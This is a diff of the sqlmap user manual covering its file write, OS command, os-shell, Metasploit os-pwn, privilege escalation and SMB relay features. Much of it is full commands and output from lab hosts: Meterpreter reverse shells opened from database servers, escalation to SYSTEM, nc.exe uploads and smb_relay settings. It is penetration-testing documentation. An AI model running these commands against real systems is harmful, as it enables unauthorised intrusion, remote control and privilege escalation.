       [hh:mm:54] [INFO] Fetched data logged to text files under '/home/inquis/sqlmap/output/
      -192.168.1.121'
      +172.16.213.131'
       
      -$ ls -l output/192.168.1.121/files/C__example.exe 
      --rw-r--r-- 1 inquis inquis 2560 2009-MM-DD hh:mm output/192.168.1.121/files/C__example.exe
      +$ ls -l output/172.16.213.131/files/C__example.exe 
      +-rw-r--r-- 1 inquis inquis 2560 2009-MM-DD hh:mm output/172.16.213.131/files/C__example.exe
       
      -$ file output/192.168.1.121/files/C__example.exe 
      -output/192.168.1.121/files/C__example.exe: PE32 executable for MS Windows (GUI) Intel 80386 32-bit
      +$ file output/172.16.213.131/files/C__example.exe 
      +output/172.16.213.131/files/C__example.exe: PE32 executable for MS Windows (GUI) Intel 80386 32-bit
       

      -

      Write a local file on the back-end DBMS file system

      +

      Write a local file on the database server's file system

      -

      Options: --write-file and --dest-file

      +

      Options: --write-file and --dest-file

      -

      It is possible to upload a local file to the underlying file system when -the back-end database management system is either MySQL, PostgreSQL or -Microsoft SQL Server and the session user has the needed privileges to +

      It is possible to upload a local file to the database server file system +when the back-end database management system is either MySQL, PostgreSQL +or Microsoft SQL Server, and the session user has the needed privileges to abuse database specific functionalities and architectural weaknesses. -The file specified can be either a text or a binary file, sqlmap will -handle either cases automatically.

      +The file specified can be either a text or a binary file. sqlmap will +handle it automatically.

      -

      These techniques are detailed on the white paper +

      These techniques are detailed in the white paper Advanced SQL injection to operating system full control.

      Example on a MySQL 5.0.67 target to upload a binary UPX-compressed @@ -4092,7 +4430,7 @@ $ file /tmp/nc.exe.packed $ ls -l /tmp/nc.exe.packed -rwxr-xr-x 1 inquis inquis 31744 2009-MM-DD hh:mm /tmp/nc.exe.packed -$ python sqlmap.py -u "http://192.168.1.121/sqlmap/mysql/get_int.aspx?id=1" --write-file \ +$ python sqlmap.py -u "http://172.16.213.131/sqlmap/mysql/get_int.aspx?id=1" --write-file \ "/tmp/nc.exe.packed" --dest-file "C:\WINDOWS\Temp\nc.exe" -v 1 [...] @@ -4117,46 +4455,74 @@ same size as the local file '/tmp/nc.exe.packed'

      +

      Example on a PostgreSQL 8.4 target to upload a text file:

      +

      +

      +
      +$ python sqlmap.py -u http://172.16.213.131/sqlmap/pgsql/get_int8.4.php?id=1 \
      +  --write-file /etc/passwd --dest-file /tmp/writtenfrompgsql -v 1
       
      -

      5.9 Operating system access +[...] +web application technology: PHP 5.2.6, Apache 2.2.9 +back-end DBMS: PostgreSQL + +[hh:mm:01] [INFO] testing stacked queries support on parameter 'id' +[hh:mm:01] [INFO] detecting back-end DBMS version from its banner +[hh:mm:01] [INFO] retrieved: 8.4.2 +[hh:mm:07] [INFO] the web application supports stacked queries on parameter 'id' +[hh:mm:07] [INFO] fingerprinting the back-end DBMS operating system +[hh:mm:07] [INFO] retrieved: 0 +[hh:mm:07] [INFO] retrieved: 0 +[hh:mm:07] [INFO] the back-end DBMS operating system is Linux +do you want confirmation that the file '/tmp/writtenfrompgsql' has been successfully +written on the back-end DBMS file system? [Y/n] +[hh:mm:14] [INFO] retrieved: 2264 +[hh:mm:14] [INFO] the file has been successfully written and its size is 2264 bytes, +same size as the local file '/etc/passwd' +

      +
      +

      + + +

      5.10 Operating system access

      Execute arbitrary operating system command

      -

      Options: --os-cmd and --os-shell

      +

      Options: --os-cmd and --os-shell

      It is possible to execute arbitrary commands on the underlying operating system when the back-end database management system is either MySQL, -PostgreSQL or Microsoft SQL Server and the session user has the needed +PostgreSQL or Microsoft SQL Server, and the session user has the needed privileges to abuse database specific functionalities and architectural weaknesses.

      On MySQL and PostgreSQL, sqlmap uploads (via the file upload functionality -demonstrated above) a shared library (binary file) containing two +explained above) a shared library (binary file) containing two user-defined functions, sys_exec() and sys_eval(), then it creates these two functions on the database and call one of them to execute the specified command, depending on the user's choice to display the standard output or not. On Microsoft SQL Server, sqlmap abuses the xp_cmshell stored -procedure: if it's disable sqlmap re-enables it, if it does not exist, +procedure: if it's disabled, sqlmap re-enables it; if it does not exist, sqlmap creates it from scratch.

      If the user wants to retrieve the command standard output, sqlmap will use one of the enumeration SQL injection techniques (blind or inband) to -retrieve it, viceversa sqlmap will use the stacked query SQL injection -technique to execute the command without returning anything to the user.

      +retrieve it or, in case of stacked query SQL injection technique, +sqlmap will execute the command without returning anything to the user.

      -

      These techniques are detailed on the white paper +

      These techniques are detailed in the white paper Advanced SQL injection to operating system full control.

      It is possible to specify a single command to be executed with the ---os-cmd option.

      +--os-cmd option.

      Example on a PostgreSQL 8.3.5 target:

      -$ python sqlmap.py -u "http://192.168.1.121/sqlmap/pgsql/get_int.aspx?id=1" \
      +$ python sqlmap.py -u "http://172.16.213.131/sqlmap/pgsql/get_int.aspx?id=1" \
         --os-cmd "whoami" -v 1
       
       [...]
      @@ -4191,7 +4557,7 @@ command standard output:    'w2k3dev\postgres'
       

      -$ python sqlmap.py -u "http://192.168.1.121/sqlmap/mssql/iis/get_str2.asp?name=luther" \
      +$ python sqlmap.py -u "http://172.16.213.131/sqlmap/mssql/iis/get_str2.asp?name=luther" \
         --os-cmd "whoami" --union-use -v 1
       
       [...]
      @@ -4209,7 +4575,7 @@ injection vulnerability
       by appending a false condition after the parameter value
       [hh:mm:58] [INFO] the target url is affected by an exploitable partial (single entry) inband 
       sql injection vulnerability
      -valid union:    'http://192.168.1.121:80/sqlmap/mssql/iis/get_str2.asp?name=luther' UNION 
      +valid union:    'http://172.16.213.131/sqlmap/mssql/iis/get_str2.asp?name=luther' UNION 
       ALL SELECT NULL, NULL, NULL-- AND 'SonLv'='SonLv'
       
       [hh:mm:58] [INFO] testing stacked queries support on parameter 'name'
      @@ -4228,15 +4594,15 @@ nt authority\network service
       

      It is also possible to simulate a real shell where you can type as many -arbitrary commands as you wish. The option is --os-shell and has -the same TAB completion and history functionalities implemented for ---sql-shell.

      +arbitrary commands as you wish. The option is --os-shell and has +the same TAB completion and history functionalities like +--sql-shell.

      Example on a MySQL 5.0.67 target:

      -$ python sqlmap.py -u "http://192.168.1.121/sqlmap/mysql/get_int.aspx?id=1" \
      +$ python sqlmap.py -u "http://172.16.213.131/sqlmap/mysql/get_int.aspx?id=1" \
         --os-shell -v 2
       
       [...]
      @@ -4347,13 +4713,13 @@ can only be deleted manually
       

      -

      Now run it again, but specifying the --union-use to retrieve the +

      Now run it again, but specifying the --union-use to retrieve the command standard output quicker, via UNION based SQL injection, when the parameter is affected also by inband SQL injection vulnerability:

      -$ python sqlmap.py -u "http://192.168.1.121/sqlmap/mysql/get_int.aspx?id=1" \
      +$ python sqlmap.py -u "http://172.16.213.131/sqlmap/mysql/get_int.aspx?id=1" \
         --os-shell -v 2 --union-use
       
       [...]
      @@ -4367,7 +4733,7 @@ technique
       [hh:mm:16] [INFO] confirming full inband sql injection on parameter 'id'
       [hh:mm:16] [INFO] the target url is affected by an exploitable full inband sql injection 
       vulnerability
      -valid union:    'http://192.168.1.121:80/sqlmap/mysql/iis/get_int.aspx?id=1 UNION ALL SELECT 
      +valid union:    'http://172.16.213.131/sqlmap/mysql/iis/get_int.aspx?id=1 UNION ALL SELECT 
       NULL, NULL, NULL# AND 528=528'
       
       [hh:mm:16] [INFO] testing stacked queries support on parameter 'id'
      @@ -4432,9 +4798,9 @@ Windows IP Configuration
       Ethernet adapter Local Area Connection 2:
       
          Connection-specific DNS Suffix  . : localdomain
      -   IP Address. . . . . . . . . . . . : 192.168.1.121
      +   IP Address. . . . . . . . . . . . : 172.16.213.131
          Subnet Mask . . . . . . . . . . . : 255.255.255.0
      ----Default Gateway . . . . . . . . . : 192.168.1.1
      +---Default Gateway . . . . . . . . . : 172.16.213.1
       
       os-shell> exit
       [hh:mm:41] [INFO] cleaning up the database management system
      @@ -4455,103 +4821,115 @@ user-defined functions are already created, if so, it asks the user if he
       wants to recreate them or keep them and save time.

      -

      Prompt for an out-of-band shell, meterpreter or VNC

      +

      Prompt for an out-of-band shell, Meterpreter or VNC

      -

      Options: --os-pwn, --priv-esc, --msf-path and --tmp-path

      +

      Options: --os-pwn, --priv-esc, --msf-path and --tmp-path

      -

      It is possible to establish an out-of-band TCP stateful channel -between the attacker and the underlying operating system by using the -exploited SQL injection as a stepping stone. This is implemented for MySQL, -PostgreSQL and Microsoft SQL Server. -sqlmap relies on the -Metasploit to perform this attack, so you need to have it already -on your system: it's free and can be downloaded from the homepage. It is -required to use Metasploit Framework version 3.3 or above.

      +

      It is possible to establish an out-of-band stateful TCP connection +between the user machine and the database server underlying operating +system. This channel can be an interactive command prompt, a Meterpreter +session or a graphical user interface (VNC) session as per user's choice. +sqlmap relies on Metasploit to create the shellcode and implements four +different techniques to execute it on the database server. These +techniques are: +

        +
      • Database in-memory execution of the Metasploit's shellcode +via sqlmap own user-defined function sys_bineval(). Supported on +MySQL and PostgreSQL.
      • +
      • Upload and execution of a Metasploit's stand-alone payload +stager via sqlmap own user-defined function sys_exec() on +MySQL and PostgreSQL or via xp_cmdshell() on Microsoft SQL +Server.
      • +
      • Execution of Metasploit's shellcode by performing a SMB +reflection attack ( +MS08-068) with a UNC path request from the database server to +the user's machine where the Metasploit smb_relay server exploit +runs.
      • +
      • Database in-memory execution of the Metasploit's shellcode by +exploiting Microsoft SQL Server 2000 and 2005 +sp_replwritetovarbin stored procedure heap-based buffer +overflow ( +MS09-004) with automatic DEP bypass.
      • +
      +

      Note that this feature is not supported by sqlmap running on Windows -because Metasploit's msfconsole and msfcli are not supported on the native -Windows Ruby interpreter.

      +because it relies on Metasploit's msfcli which is not +available for Windows.

      -

      These techniques are detailed on the white paper -Advanced SQL injection to operating system full control.

      +

      These techniques are detailed in the white paper +Advanced SQL injection to operating system full control and in the +slide deck +Expanding the control over the operating system from the database.

      -

      Example on a MySQL 5.0.67 target:

      +

      Example on a MySQL 5.1 target:

      -$ python sqlmap.py -u "http://192.168.1.121/sqlmap/mysql/get_int.aspx?id=1" \
      +$ python sqlmap.py -u "http://172.16.213.128/sqlmap/mysql/get_int_51.aspx?id=1" \
         --os-pwn -v 1 --msf-path /home/inquis/software/metasploit
       
       [...]
      -[hh:mm:17] [INFO] the back-end DBMS is MySQL
       web server operating system: Windows 2003 or 2008
       web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727
       back-end DBMS: MySQL >= 5.0.0
       
      -[hh:mm:17] [INFO] testing stacked queries support on parameter 'id'
      -[hh:mm:17] [INFO] detecting back-end DBMS version from its banner
      -[hh:mm:17] [INFO] retrieved: 5.0.67
      -[hh:mm:23] [INFO] the web application supports stacked queries on parameter 'id'
      -[hh:mm:23] [INFO] fingerprinting the back-end DBMS operating system
      -[hh:mm:23] [INFO] retrieved: C
      -[hh:mm:23] [INFO] the back-end DBMS operating system is Windows
      -[hh:mm:23] [INFO] testing if current user is DBA
      -[hh:mm:23] [INFO] retrieved: 1
      -[hh:mm:23] [INFO] checking if sys_exec UDF already exist
      -[hh:mm:23] [INFO] retrieved: 1
      -[hh:mm:24] [INFO] sys_exec UDF already exists, do you want to overwrite it? [y/N] N
      -[hh:mm:24] [INFO] checking if sys_eval UDF already exist
      -[hh:mm:24] [INFO] retrieved: 1
      -[hh:mm:24] [INFO] sys_eval UDF already exists, do you want to overwrite it? [y/N] N
      -[hh:mm:24] [INFO] creating Metasploit Framework 3 payload stager
      -[hh:mm:24] [INFO] which connection type do you want to use?
      -[1] Bind TCP (default)
      -[2] Bind TCP (No NX)
      -[3] Reverse TCP
      -[4] Reverse TCP (No NX)
      +[hh:mm:09] [INFO] testing stacked queries support on parameter 'id'
      +[hh:mm:09] [INFO] detecting back-end DBMS version from its banner
      +[hh:mm:09] [INFO] retrieved: 5.1.30
      +[hh:mm:18] [INFO] the web application supports stacked queries on parameter 'id'
      +[hh:mm:18] [INFO] fingerprinting the back-end DBMS operating system
      +[hh:mm:18] [INFO] retrieved: C
      +[hh:mm:19] [INFO] the back-end DBMS operating system is Windows
      +[hh:mm:19] [INFO] testing if current user is DBA
      +[hh:mm:19] [INFO] retrieved: 1
      +[hh:mm:20] [INFO] checking if UDF 'sys_bineval' already exist
      +[hh:mm:20] [INFO] retrieved: 0
      +[hh:mm:21] [INFO] checking if UDF 'sys_exec' already exist
      +[hh:mm:21] [INFO] retrieved: 0
      +[hh:mm:21] [INFO] retrieving MySQL base directory absolute path
      +[hh:mm:21] [INFO] retrieved: C:\Program Files\MySQL\MySQL Server 5.1\
      +[hh:mm:46] [WARNING] this will only work if the database administrator created manually 
      +the 'C:/Program Files/MySQL/MySQL Server 5.1/lib/plugin' subfolder
      +[hh:mm:47] [INFO] creating UDF 'sys_bineval' from the binary UDF file
      +[hh:mm:47] [INFO] creating UDF 'sys_exec' from the binary UDF file
      +how do you want to execute the Metasploit shellcode on the back-end database underlying 
      +operating system?
      +[1] Via UDF 'sys_bineval' (in-memory way, anti-forensics, default)
      +[2] Stand-alone payload stager (file system way)
       > 1
      -[hh:mm:24] [INFO] which is the back-end DBMS address? [192.168.1.121] 192.168.1.121
      -[hh:mm:24] [INFO] which remote port numer do you want to use? [61588] 61588
      -[hh:mm:24] [INFO] which payload do you want to use?
      -[1] Reflective Meterpreter (default)
      -[2] PatchUp Meterpreter (only from Metasploit development revision 6742)
      -[3] Shell
      -[4] Reflective VNC
      -[5] PatchUp VNC (only from Metasploit development revision 6742)
      +[hh:mm:51] [INFO] creating Metasploit Framework 3 multi-stage shellcode 
      +which connection type do you want to use?
      +[1] Reverse TCP: Connect back from the database host to this machine (default)
      +[2] Reverse TCP: Try to connect back from the database host to this machine, on all ports 
      +between the specified and 65535
      +[3] Bind TCP: Listen on the database host for a connection
       > 1
      -[hh:mm:24] [INFO] which payload encoding do you want to use?
      -[1] No Encoder
      -[2] Alpha2 Alphanumeric Mixedcase Encoder
      -[3] Alpha2 Alphanumeric Uppercase Encoder
      -[4] Avoid UTF8/tolower
      -[5] Call+4 Dword XOR Encoder
      -[6] Single-byte XOR Countdown Encoder
      -[7] Variable-length Fnstenv/mov Dword XOR Encoder
      -[8] Polymorphic Jump/Call XOR Additive Feedback Encoder
      -[9] Non-Alpha Encoder
      -[10] Non-Upper Encoder
      -[11] Polymorphic XOR Additive Feedback Encoder (default)
      -[12] Alpha2 Alphanumeric Unicode Mixedcase Encoder
      -[13] Alpha2 Alphanumeric Unicode Uppercase Encoder
      -> 11
      -[hh:mm:24] [INFO] creation in progress .................. done
      -[hh:mm:42] [INFO] compression in progress . quit unexpectedly with return code 1
      -[hh:mm:43] [INFO] failed to compress the file because you provided a Metasploit version 
      -above 3.3-dev revision 6681. This will not inficiate the correct execution of sqlmap. 
      -It might only slow down a bit the execution of sqlmap
      -[hh:mm:43] [INFO] uploading payload stager to 'C:/WINDOWS/Temp/sqlmapmsfgcpge.exe'
      -[hh:mm:44] [INFO] running Metasploit Framework 3 command line interface locally, wait..
      -[hh:mm:44] [INFO] running Metasploit Framework 3 payload stager remotely, wait..
      +which is the local address? [172.16.213.1] 
      +which local port number do you want to use? [47776] 
      +which payload do you want to use?
      +[1] Meterpreter (default)
      +[2] Shell
      +[3] VNC
      +> 1
      +[hh:mm:55] [INFO] creation in progress .............................................. done
      +[hh:mm:41] [INFO] running Metasploit Framework 3 command line interface locally, wait..
       [*] Please wait while we load the module tree...
      -[*] Started bind handler
      +[*] Started reverse handler on 172.16.213.1:47776 
       [*] Starting the payload handler...
      -[*] Transmitting intermediate stager for over-sized stage...(216 bytes)
      -[*] Sending stage (718336 bytes)
      -[*] Meterpreter session 1 opened (192.168.1.161:47832 -> 192.168.1.121:61588)
      +[hh:mm:22] [INFO] running Metasploit Framework 3 shellcode remotely via UDF 'sys_bineval', wait..
      +[*] Sending stage (748032 bytes)
      +[*] Meterpreter session 1 opened (172.16.213.1:47776 -> 172.16.213.128:2176)
       
      +meterpreter > Loading extension espia...success.
      +meterpreter > Loading extension incognito...success.
       meterpreter > Loading extension priv...success.
      -meterpreter > getuid
      -Server username: NT AUTHORITY\SYSTEM
      +meterpreter > Loading extension sniffer...success.
      +meterpreter > Computer: W2K3DEV
      +OS      : Windows .NET Server (Build 3790, Service Pack 2).
      +Arch    : x86
      +Language: en_US
      +meterpreter > Server username: NT AUTHORITY\SYSTEM
       meterpreter > ipconfig
       
       MS TCP Loopback interface
      @@ -4561,78 +4939,72 @@ Netmask     : 255.0.0.0
       
       
       
      -VMware Accelerated AMD PCNet Adapter
      -Hardware MAC: 00:0c:29:29:ee:86
      -IP Address  : 192.168.1.121
      +VMware Accelerated AMD PCNet Adapter #2
      +Hardware MAC: 00:0c:29:86:69:1b
      +IP Address  : 172.16.213.128
       Netmask     : 255.255.255.0
       
       
      -meterpreter > pwd
      -C:\Program Files\MySQL\MySQL Server 5.0\Data
       meterpreter > exit
      +
      +[hh:mm:52] [INFO] cleaning up the database management system
      +do you want to remove UDF 'sys_bineval'? [Y/n] 
      +do you want to remove UDF 'sys_exec'? [Y/n] 
      +[hh:mm:54] [INFO] database management system cleanup finished
      +[hh:mm:54] [WARNING] remember that UDF dynamic-link library files and Metasploit related 
      +files in the temporary folder saved on the file system can only be deleted manually
       

      By default MySQL on Windows runs as SYSTEM, however PostgreSQL -run as a low-privileged user postgres on both Windows and Linux. +runs as a low-privileged user postgres on both Windows and Linux. Microsoft SQL Server 2000 by default runs as SYSTEM, whereas Microsoft SQL Server 2005 and 2008 run most of the times as NETWORK SERVICE and sometimes as LOCAL SERVICE.

      -

      It is possible to provide sqlmap with the --priv-esc option to -abuse Windows access tokens and escalate privileges to SYSTEM -within the Meterpreter session created if the underlying operating system -is not patched against Microsoft Security Bulletin -MS09-012. -sqlmap performs the -Windows Token kidnapping -technique by uploading +

      It is possible to provide sqlmap with the --priv-esc +option to perform a database process' user privilege escalation +via Metasploit's getsystem command which include, among others, +the +kitrap0d technique ( +MS10-015) or via +Windows Access Tokens kidnapping by using either Meterpreter's +incognito extension or Churrasco -local exploit and using it to call the Metasploit's payload stager -executable. sqlmap uses also the Metasploit's Meterpreter -incognito -extension to abused Windows access tokens in conjunction to Churrasco -stand-alone exploit if the user wants so.

      - -

      Note that this feature is not supported by sqlmap installed from the -DEB package because it relies on Churrasco, which is not explicitly free -software so it has not been included in the package.

      - -

      This technique is detailed on the white paper -Advanced SQL injection to operating system full control.

      +( +MS09-012) stand-alone executable as per user's choice.

      Example on a Microsoft SQL Server 2005 Service Pack 0 running as NETWORK SERVICE on the target:

      -$ python sqlmap.py -u "http://192.168.1.121/sqlmap/mssql/iis/get_str2.asp?name=luther" \
      +$ python sqlmap.py -u "http://172.16.213.128/sqlmap/mssql/iis/get_int.asp?id=1" \
         --os-pwn -v 1 --msf-path /home/inquis/software/metasploit --priv-esc
       
       [...]
      -[hh:mm:17] [INFO] the back-end DBMS is Microsoft SQL Server
       web server operating system: Windows 2000
       web application technology: ASP.NET, Microsoft IIS 6.0, ASP
       back-end DBMS: Microsoft SQL Server 2005
       
      -[hh:mm:17] [INFO] testing stacked queries support on parameter 'name'
      -[hh:mm:22] [INFO] the web application supports stacked queries on parameter 'name'
      -[hh:mm:22] [INFO] testing if current user is DBA
      -[hh:mm:22] [INFO] retrieved: 1
      -[hh:mm:23] [INFO] checking if xp_cmdshell extended procedure is available, wait..
      -[hh:mm:29] [INFO] xp_cmdshell extended procedure is available
      -[hh:mm:29] [INFO] creating Metasploit Framework 3 payload stager
      +[hh:mm:47] [INFO] testing stacked queries support on parameter 'id'
      +[hh:mm:52] [INFO] the web application supports stacked queries on parameter 'id'
      +[hh:mm:52] [INFO] testing if current user is DBA
      +[hh:mm:52] [INFO] retrieved: 1
      +[hh:mm:52] [INFO] checking if xp_cmdshell extended procedure is available, wait..
      +[hh:mm:01] [INFO] xp_cmdshell extended procedure is available
      +[hh:mm:01] [INFO] creating Metasploit Framework 3 payload stager
       which connection type do you want to use?
      -[1] Bind TCP (default)
      -[2] Bind TCP (No NX)
      -[3] Reverse TCP
      -[4] Reverse TCP (No NX)
      -> 3
      -which is the local address? [192.168.1.161] 
      -which local port numer do you want to use? [61499] 
      -[hh:mm:54] [INFO] forcing Metasploit payload to Meterpreter because it is the only payload 
      -that can be used to abuse Windows Impersonation Tokens via Meterpreter 'incognito' 
      -extension to privilege escalate
      +[1] Reverse TCP: Connect back from the database host to this machine (default)
      +[2] Reverse TCP: Try to connect back from the database host to this machine, on all ports 
      +between the specified and 65535
      +[3] Bind TCP: Listen on the database host for a connection
      +> 1
      +which is the local address? [172.16.213.1] 
      +which local port number do you want to use? [44780] 
      +[hh:mm:52] [INFO] forcing Metasploit payload to Meterpreter because it is the only payload 
      +that can be used to escalate privileges, either via 'incognito' extension or via 
      +'getsystem' command
       which payload encoding do you want to use?
       [1] No Encoder
       [2] Alpha2 Alphanumeric Mixedcase Encoder
      @@ -4648,39 +5020,35 @@ which payload encoding do you want to use?
       [12] Alpha2 Alphanumeric Unicode Mixedcase Encoder
       [13] Alpha2 Alphanumeric Unicode Uppercase Encoder
       > 
      -[hh:mm:58] [INFO] creation in progress .................. done
      -[hh:mm:16] [INFO] compression in progress . quit unexpectedly with return code 1
      -[hh:mm:17] [INFO] failed to compress the file because you provided a Metasploit version 
      -above 3.3-dev revision 6681. This will not inficiate the correct execution of sqlmap. 
      -It might only slow down a bit the execution of sqlmap
      -[hh:mm:17] [INFO] uploading payload stager to 'C:/WINDOWS/Temp/sqlmapmsfyahls.exe'
      -[hh:mm:20] [WARNING] often Microsoft SQL Server 2005 runs as Network Service which has no 
      -Windows Impersonation Tokens within all threads, this makes Meterpreter's incognito 
      -extension to fail to list tokens
      +[hh:mm:53] [INFO] creation in progress ..... done
      +[hh:mm:58] [INFO] compression in progress . done
      +[hh:mm:59] [INFO] uploading payload stager to 'C:/WINDOWS/Temp/tmpmqyws.exe'
       do you want sqlmap to upload Churrasco and call the Metasploit payload stager as its 
      -argument so that it will be started as SYSTEM? [Y/n] y
      -[hh:mm:36] [INFO] the binary file is bigger than 65280 bytes. sqlmap will split it into 
      -chunks, upload them and recreate the original file out of the binary chunks server-side, 
      -wait..
      -[hh:mm:22] [INFO] file chunk 1 written
      -[14:10:06] [INFO] file chunk 2 written
      -[14:10:06] [INFO] running Metasploit Framework 3 command line interface locally, wait..
      +argument so that it will be started as SYSTEM? [y/N] 
      +[hh:mm:22] [INFO] running Metasploit Framework 3 command line interface locally, wait..
       [*] Please wait while we load the module tree...
      -[*] Handler binding to LHOST 0.0.0.0
      -[*] Started reverse handler
      +[*] Started reverse handler on 172.16.213.1:44780 
       [*] Starting the payload handler...
      -[14:10:31] [INFO] running Metasploit Framework 3 payload stager remotely, wait..
      -[*] Transmitting intermediate stager for over-sized stage...(216 bytes)
      -[*] Sending stage (718336 bytes)
      -[*] Meterpreter session 1 opened (192.168.1.161:61499 -> 192.168.1.131:3221)
      +[hh:mm:31] [INFO] running Metasploit Framework 3 payload stager remotely, wait..
      +[*] Sending stage (748032 bytes)
      +[*] Meterpreter session 1 opened (172.16.213.1:44780 -> 172.16.213.128:2185)
       
       meterpreter > 
      -[14:11:01] [INFO] loading Meterpreter 'incognito' extension and displaying the list of 
      -Access Tokens availables. Choose which user you want to impersonate by using incognito's 
      -command 'impersonate_token'
      -Loading extension priv...success.
      +[hh:mm:34] [INFO] trying to escalate privileges using Meterpreter 'getsystem' command which 
      +tries different techniques, including kitrap0d
      +[hh:mm:34] [INFO] displaying the list of Access Tokens availables. Choose which user you 
      +want to impersonate by using incognito's command 'impersonate_token' if 'getsystem' did not 
      +success to elevate privileges
      +Loading extension espia...success.
       meterpreter > Loading extension incognito...success.
      -meterpreter > Server username: NT AUTHORITY\SYSTEM
      +meterpreter > Loading extension priv...success.
      +meterpreter > Loading extension sniffer...success.
      +meterpreter > Computer: W2K3DEV
      +OS      : Windows .NET Server (Build 3790, Service Pack 2).
      +Arch    : x86
      +Language: en_US
      +meterpreter > Server username: NT AUTHORITY\NETWORK SERVICE
      +meterpreter > ...got system (via technique 4).
       meterpreter > 
       Delegation Tokens Available
       ========================================
      @@ -4688,16 +5056,34 @@ NT AUTHORITY\LOCAL SERVICE
       NT AUTHORITY\NETWORK SERVICE
       NT AUTHORITY\SYSTEM
       W2K3DEV\Administrator
      -W2K3DEV\IUSR_WIN2003
      +W2K3DEV\IUSR_W2K3STENSP0
       W2K3DEV\postgres
       
       Impersonation Tokens Available
       ========================================
       NT AUTHORITY\ANONYMOUS LOGON
       
      +meterpreter > Server username: NT AUTHORITY\SYSTEM
      +meterpreter > ipconfig
      +
      +MS TCP Loopback interface
      +Hardware MAC: 00:00:00:00:00:00
      +IP Address  : 127.0.0.1
      +Netmask     : 255.0.0.0
      +
      +
      +
      +VMware Accelerated AMD PCNet Adapter #2
      +Hardware MAC: 00:0c:29:86:69:1b
      +IP Address  : 172.16.213.128
      +Netmask     : 255.255.255.0
      +
      +
       meterpreter > getuid
       Server username: NT AUTHORITY\SYSTEM
       meterpreter > exit
      +
      +[hh:mm:52] [INFO] cleaning up the database management system
       

      @@ -4705,31 +5091,28 @@ meterpreter > exit

      One click prompt for an out-of-band shell, meterpreter or VNC

      -

      Options: --os-smbrelay, --priv-esc and --msf-path

      +

      Options: --os-smbrelay, --priv-esc and --msf-path

      -

      If the back-end database management system runs as Administrator -and the underlying operating system is not patched against Microsoft +

      If the back-end database management system runs on Windows as +Administrator and the system is not patched against Microsoft Security Bulletin -MS08-068, -sqlmap can abuse the universal naming convention (UNC) supported within -all database management systems to force the database server to initiate a -SMB connection with the attacker host, then perform a SMB authentication -relay attack in order to establish a high-privileged out-of-band TCP -stateful channel between the attacker host and the target database -server. +MS08-068, sqlmap can abuse the universal naming convention (UNC) +feature within any database management system to force the database server +to initiate a SMB connection with the attacker host, then perform a SMB +authentication relay attack in order to establish a high-privileged +out-of-band TCP stateful channel between the attacker host and +the target database server. sqlmap relies on -Metasploit's SMB relay exploit to perform this attack, so you need -to have it already on your system: it's free and can be downloaded from the -homepage. -You need to run sqlmap as root user if you want to perform a SMB -relay attack because it will need to listen on a user-specified SMB TCP -port for incoming connection attempts.

      +Metasploit's SMB relay exploit to perform this attack. +You need to run sqlmap as a privileged user (e.g. root) if you +want to perform a SMB relay attack because it will need to listen on a +user-specified SMB TCP port for incoming connection attempts.

      Note that this feature is not supported by sqlmap running on Windows -because Metasploit's msfconsole and msfcli are not supported on the native -Windows Ruby interpreter.

      +platform because it relies on Metasploit's msfpayload which is +not fully working on Windows.

      -

      This technique is detailed on the white paper +

      This technique is detailed in the white paper Advanced SQL injection to operating system full control.

      Example on a Microsoft SQL Server 2005 Service Pack 0 running as @@ -4737,7 +5120,7 @@ Windows Ruby interpreter.

      -$ sudo python sqlmap.py -u "http://192.168.1.121/sqlmap/mssql/iis/get_str2.asp?name=luther" \
      +$ sudo python sqlmap.py -u "http://172.16.213.131/sqlmap/mssql/iis/get_str2.asp?name=luther" \
         --os-smbrelay -v 1 --msf-path /home/inquis/software/metasploit
       
       [...]
      @@ -4757,8 +5140,8 @@ send the NTLM session hash when connecting to a SMB service
       [3] Reverse TCP
       [4] Reverse TCP (No NX)
       > 1
      -[hh:mm:16] [INFO] which is the local address? [192.168.1.161] 192.168.1.161
      -[hh:mm:16] [INFO] which is the back-end DBMS address? [192.168.1.131] 192.168.1.131
      +[hh:mm:16] [INFO] which is the local address? [172.16.213.161] 172.16.213.161
      +[hh:mm:16] [INFO] which is the back-end DBMS address? [172.16.213.131] 172.16.213.131
       [hh:mm:16] [INFO] which remote port numer do you want to use? [4907] 4907
       [hh:mm:16] [INFO] which payload do you want to use?
       [1] Reflective Meterpreter (default)
      @@ -4789,27 +5172,27 @@ send the NTLM session hash when connecting to a SMB service
              =[ 168 aux
       
       resource> use windows/smb/smb_relay
      -resource> set SRVHOST 192.168.1.161
      -SRVHOST => 192.168.1.161
      +resource> set SRVHOST 172.16.213.161
      +SRVHOST => 172.16.213.161
       resource> set SRVPORT 139
       SRVPORT => 139
       resource> set PAYLOAD windows/meterpreter/bind_tcp
       PAYLOAD => windows/meterpreter/bind_tcp
       resource> set LPORT 4907
       LPORT => 4907
      -resource> set RHOST 192.168.1.131
      -RHOST => 192.168.1.131
      +resource> set RHOST 172.16.213.131
      +RHOST => 172.16.213.131
       resource> exploit
       [*] Exploit running as background job.
       msf exploit(smb_relay) > 
       [*] Started bind handler
       [*] Server started.
      -[*] Received 192.168.1.131:3242 \ LMHASH:00 NTHASH: OS:Windows Server 2003 3790 
      +[*] Received 172.16.213.131:3242 \ LMHASH:00 NTHASH: OS:Windows Server 2003 3790 
       Service Pack 2 LM:
      -[*] Sending Access Denied to 192.168.1.131:3242 \
      -[*] Received 192.168.1.131:3242 W2K3DEV\Administrator LMHASH:FOO NTHASH:BAR OS:Windows 
      +[*] Sending Access Denied to 172.16.213.131:3242 \
      +[*] Received 172.16.213.131:3242 W2K3DEV\Administrator LMHASH:FOO NTHASH:BAR OS:Windows 
       Server 2003 3790 Service Pack 2 LM:
      -[*] Authenticating to 192.168.1.131 as W2K3DEV\Administrator...
      +[*] Authenticating to 172.16.213.131 as W2K3DEV\Administrator...
       [*] AUTHENTICATED as W2K3DEV\Administrator...
       [*] Connecting to the ADMIN$ share...
       [*] Regenerating the payload...
      @@ -4824,26 +5207,26 @@ Server 2003 3790 Service Pack 2 LM:
       [*] Removing the service...
       [*] Closing service handle...
       [*] Deleting \wELRmcmd.exe...
      -[*] Sending Access Denied to 192.168.1.131:3242 W2K3DEV\Administrator
      +[*] Sending Access Denied to 172.16.213.131:3242 W2K3DEV\Administrator
       [*] Transmitting intermediate stager for over-sized stage...(216 bytes)
      -[*] Received 192.168.1.131:3244 \ LMHASH:00 NTHASH: OS:Windows Server 2003 3790 
      +[*] Received 172.16.213.131:3244 \ LMHASH:00 NTHASH: OS:Windows Server 2003 3790 
       Service Pack 2 LM:
      -[*] Sending Access Denied to 192.168.1.131:3244 \
